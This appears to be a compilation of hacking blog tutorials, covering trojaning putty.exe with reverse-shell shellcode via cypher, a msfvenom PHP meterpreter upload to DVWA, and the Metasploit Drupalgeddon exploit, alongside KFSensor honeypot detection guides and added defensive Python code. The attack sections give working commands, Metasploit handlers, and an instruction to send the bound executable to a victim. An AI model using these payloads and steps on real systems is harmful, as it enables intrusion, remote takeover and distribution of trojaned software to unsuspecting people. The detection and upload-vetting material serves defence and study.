Hack Remote Windows 10 PC using Cypher (Adding Shellcode to PE files)

First, clone the cypher repository from GitHub. To do so, type:


git clone https://github.com/xan7r/cypher.git


Now choose an executable file and copy it to the cypher folder so that cypher can bind to it; any .exe file will do.

Here, in my case, I have copied putty.exe as the file to bind with cypher.

Note: only executable files can be bound.


Now run the following command:

python addShell.py -f ./putty.exe -H 192.168.0.105 -P 4444 -p 0


Now we need to set up a listener to handle the reverse connection sent by the victim when the exploit executes successfully. Start Metasploit using msfconsole:


use exploit/multi/handler
set payload windows/shell_reverse_tcp
set lhost 192.168.0.105
set lport 4444
exploit

Now send the bound putty_evil.exe to the victim. As soon as he opens the file, a shell session will open.
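From the defender's side, a bound file such as putty_evil.exe no longer matches the original putty.exe. The following added example (not part of the original article or of cypher) compares the PE entry point and section table of a trusted copy against a received copy; the function names and the constructed sample image are assumptions made for illustration.

```python
import hashlib
import struct

MEM_EXECUTE, MEM_WRITE = 0x20000000, 0x80000000  # IMAGE_SCN_MEM_* flags

def pe_layout(data):
    """Return (entry_point_rva, {section: (flags, sha256 of raw data)})."""
    if data[:2] != b"MZ" or len(data) < 0x40:
        raise ValueError("not an MZ executable")
    pe, = struct.unpack_from("<I", data, 0x3C)               # e_lfanew
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    nsect, = struct.unpack_from("<H", data, pe + 6)          # NumberOfSections
    opt_size, = struct.unpack_from("<H", data, pe + 20)      # SizeOfOptionalHeader
    entry, = struct.unpack_from("<I", data, pe + 24 + 16)    # AddressOfEntryPoint
    sections = {}
    for i in range(nsect):
        off = pe + 24 + opt_size + 40 * i                    # 40-byte section header
        name = data[off:off + 8].rstrip(b"\0").decode("latin-1")
        # SizeOfRawData, PointerToRawData, (12 bytes skipped), Characteristics
        rsize, rptr, flags = struct.unpack_from("<II12xI", data, off + 16)
        sections[name] = (flags, hashlib.sha256(data[rptr:rptr + rsize]).hexdigest())
    return entry, sections

def compare_pe(trusted, suspect):
    """List how a received binary differs from a trusted copy of the same file."""
    (t_entry, t_sec), (s_entry, s_sec) = pe_layout(trusted), pe_layout(suspect)
    findings = []
    if t_entry != s_entry:
        findings.append("entry point changed: %#x -> %#x" % (t_entry, s_entry))
    for name, (flags, digest) in s_sec.items():
        if name not in t_sec:
            findings.append("new section: " + name)
        elif t_sec[name] != (flags, digest):
            findings.append("section modified: " + name)
        if flags & MEM_EXECUTE and flags & MEM_WRITE:
            findings.append("writable and executable section: " + name)
    findings += ["section removed: " + n for n in t_sec if n not in s_sec]
    return findings

def sample_pe(entry, sections):
    """Constructed PE image for the demo (not a runnable program).
    sections is a list of (name_bytes, flags, raw_bytes)."""
    head = b"MZ" + bytes(58) + struct.pack("<I", 64) + b"PE\0\0"
    head += struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 224, 0x102)
    head += struct.pack("<H14xI204x", 0x10B, entry)          # PE32 optional header
    table, body = b"", b""
    for name, flags, raw in sections:
        rptr = len(head) + 40 * len(sections) + len(body)
        table += struct.pack("<8sIIII12xI", name, len(raw), 0x1000, len(raw), rptr, flags)
        body += raw
    return head + table + body
```

With real files, read both with open(path, "rb").read() and pass the bytes to compare_pe; the trusted side should be a copy obtained from the vendor and checked against its published checksum or signature.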

Detect Vulnerability Scanner in Network using Kfsensor

In the previous article, we saw how the KFSensor Honeypot IDS detects unauthorized users by simulating vulnerable system services. To an attacker, a vulnerability is like a jewel. The first phase of an attack is footprinting and the second is scanning, where the attacker learns whether a system is vulnerable to attack or not. So in this article, we will detect an unauthorized person or hacker who is scanning and stop them.

Install and start the KFSensor Honeypot IDS server; to do this, read my previous article.

Here my KFSensor Honeypot is ready.


The scanning phase tells an attacker whether a system is vulnerable or not, and sometimes even provides information about exploits available for that vulnerability. So every hacker performs this step before exploiting your system.
So here I scan my system running KFSensor with the Nessus vulnerability scanner from another computer.


As you can see, Nessus started scanning my system and finding vulnerabilities.


Here you can see that the KFSensor Honeypot IDS alerted you that someone is trying to scan your system for vulnerabilities and that some of the packets your system is receiving are malicious, and it recorded the attacker's IP address.


Now I’m also scanning my system with GFI LanGuard to see whether the KFSensor IDS detects it or not.


GFI LanGuard started scanning.


Here the KFSensor Honeypot IDS alerted that someone is sending packets to find the system's vulnerabilities. Here you can monitor attacks on every TCP and UDP port. You can even see ICMP or ping messages.


Here you can see that someone is attacking a port, and that his IP address is 192.168.149.1


You can also view alerts by visitor, which shows which IP address is trying to access which ports.



The KFSensor Honeypot IDS can also detect whether someone is using a vulnerability scanner to perform an attack on your system. Now we know that a particular IP address is sending too many packets, which is not good. To block that IP address, we have to create a separate policy for that visitor.
To do that, double-click the IP address you want to block from accessing your system; a menu will appear.


Now click on details.




Here click on Create Visitor Rule to create a policy.
After that, select the port you want to block for that IP address, and select the action Close or Ignore to apply to all requests from that particular IP address.
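The pattern that gives a vulnerability scanner away in the honeypot's visitor view, one source touching many different ports in a short time, can also be checked automatically. The following added example (not part of the original article and not KFSensor code) runs that check over constructed event records; the record layout, thresholds and function names are assumptions.

```python
from collections import defaultdict, deque

# Constructed honeypot events: (epoch seconds, source IP, protocol, port).
# This is not KFSensor's export format; map your own event export onto it.
EVENTS = [(1000 + i, "192.168.149.1", "tcp", port) for i, port in
          enumerate([21, 22, 23, 25, 80, 110, 135, 139, 445, 3389])]
EVENTS += [(1000, "192.168.149.20", "tcp", 80), (1030, "192.168.149.20", "tcp", 80),
           (1300, "192.168.149.20", "tcp", 21)]            # ordinary visitor
EVENTS += [(1000 + 1200 * i, "192.168.149.30", "tcp", port) for i, port in
           enumerate([21, 23, 80, 135, 445, 3389])]        # slow, spread-out probe

def find_scanners(events, window=60, min_ports=5):
    """Return {ip: peak count of distinct (protocol, port) pairs hit within
    any `window` seconds} for the sources that reach `min_ports`."""
    recent = defaultdict(deque)      # ip -> events still inside the window
    peak = defaultdict(int)
    for ts, ip, proto, port in sorted(events):
        queue = recent[ip]
        queue.append((ts, proto, port))
        while ts - queue[0][0] > window:
            queue.popleft()          # drop events older than the window
        peak[ip] = max(peak[ip], len({(p, n) for _, p, n in queue}))
    return {ip: n for ip, n in peak.items() if n >= min_ports}

def ports_by_visitor(events, ips):
    """Group the ports each flagged source touched, as input for a block rule."""
    seen = defaultdict(set)
    for _, ip, proto, port in events:
        if ip in ips:
            seen[ip].add((proto, port))
    return {ip: sorted(pairs) for ip, pairs in seen.items()}
```

With the default 60-second window only the fast scan from 192.168.149.1 is flagged; the slow probe from 192.168.149.30 appears only when the window is widened, which is why a short window alone misses patient scanners.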

Web Server Penetration with DVWA and Metasploit (Beginner Guide)

Open your Kali Linux terminal and type:

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.140 lport=4444 -f raw


It will generate the raw code of a PHP file.


Now copy the generated code into a text file and save it on your desktop with a .php extension.


Now open the DVWA web app on your server and log in with the following credentials:
Username - admin
Password - password


Now scroll to the File Upload section in the left pane and upload the PHP file created above.


When the upload finishes, it will show you the path of the uploaded file.


Now open your uploaded file in the browser.


Now we need to set up a listener to handle the reverse connection sent by the victim when the exploit executes successfully.

use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.0.140
set lport 4444
exploit

Now you can access the victim's server.
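The upload above works because the application stores a client-named .php file in a place where the web server will execute it. The following added example (not DVWA's code and not part of the original article) sketches, in Python, the server-side checks that close this path; vet_upload, ALLOWED and MAX_BYTES are illustrative names and the size limit is an assumption.

```python
import os
import secrets

# Allowlisted image types: extension -> leading magic bytes of that format.
ALLOWED = {".png": b"\x89PNG\r\n\x1a\n", ".gif": b"GIF8",
           ".jpg": b"\xff\xd8\xff", ".jpeg": b"\xff\xd8\xff"}
MAX_BYTES = 100_000   # example limit (assumption); size it for your application

def vet_upload(filename, data):
    """Return (stored_name, None) if the upload is accepted, else (None, reason)."""
    base = os.path.basename(filename.replace("\\", "/"))    # drop any client path
    stem, ext = os.path.splitext(base.lower())
    if ext not in ALLOWED:
        return None, "extension %r is not on the allowlist" % ext
    if "." in stem:
        # e.g. shell.php.jpg: some handler configurations still treat it as PHP
        return None, "more than one extension"
    if len(data) > MAX_BYTES:
        return None, "file too large"
    if not data.startswith(ALLOWED[ext]):
        return None, "content does not match the %s format" % ext
    # The client's name never reaches the disk: the server picks a random one
    # and keeps only the vetted extension. Store the file in a directory the
    # web server does not execute scripts from; a magic-byte check alone does
    # not stop a file that is both a valid image header and script text.
    return secrets.token_hex(16) + ext, None
```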

Detect Hacker in Network using kfsensor Honeypot

KFSensor is a Windows-based honeypot IDS (Intrusion Detection System) that attracts and detects hackers, other unauthorized users and Trojans by creating a virtual vulnerable system and services. By acting as a lure server or system, it can divert attacks and unauthorized visits away from crucial and critical systems. KFSensor is designed for use in Windows-based corporate environments and provides a cost-effective way to improve network-level security.
Let’s see how it works and protects.

You can download KFSensor from their official website or follow this link http://goo.gl/YrFmkb
So here I installed KFSensor on my system. When you open KFSensor for the first time on your system, you have to configure it, so let’s do it.

Click Next


Now you have to select the native services to monitor. These services are run by the system by default.


If you want notifications about attacks sent directly to your email account, enter your email details in this section to receive KFSensor email alerts.


Finally, click Finish to start monitoring your network.


This is the main interface of KFSensor, where you can see every visit in detail. You can view visitors by port as well as by IP address.



So now, if an intruder tries to scan or attack your system, KFSensor will show them a simulated vulnerable machine and record their IP address, protocols, the type of attack or scan they are performing, etc.
For example, here I’m scanning the IP address of the Windows system running KFSensor with Nmap from my Linux system. You can see that the Nmap results show lots of services running on the Windows system which could be used to perform an attack.


While I was performing the Nmap scan, KFSensor captured and recorded my IP address. You can see that someone visited port 21, which is used for file transfer, and that the visitor name is pc2-pc.rajlab.com

Hack Drupal Website Server using Drupal HTTP Parameter Key/Value SQL Injection


Exploit Targets
Drupal 7.0

Requirement
Attacker: Kali Linux
Victim PC: Drupal 7.0


Open a Kali terminal and type msfconsole


msf exploit (drupal_drupageddon)>set targeturi /drupal/
msf exploit (drupal_drupageddon)>set rhost 192.168.0.109 (IP of Remote Host)
msf exploit (drupal_drupageddon)>exploit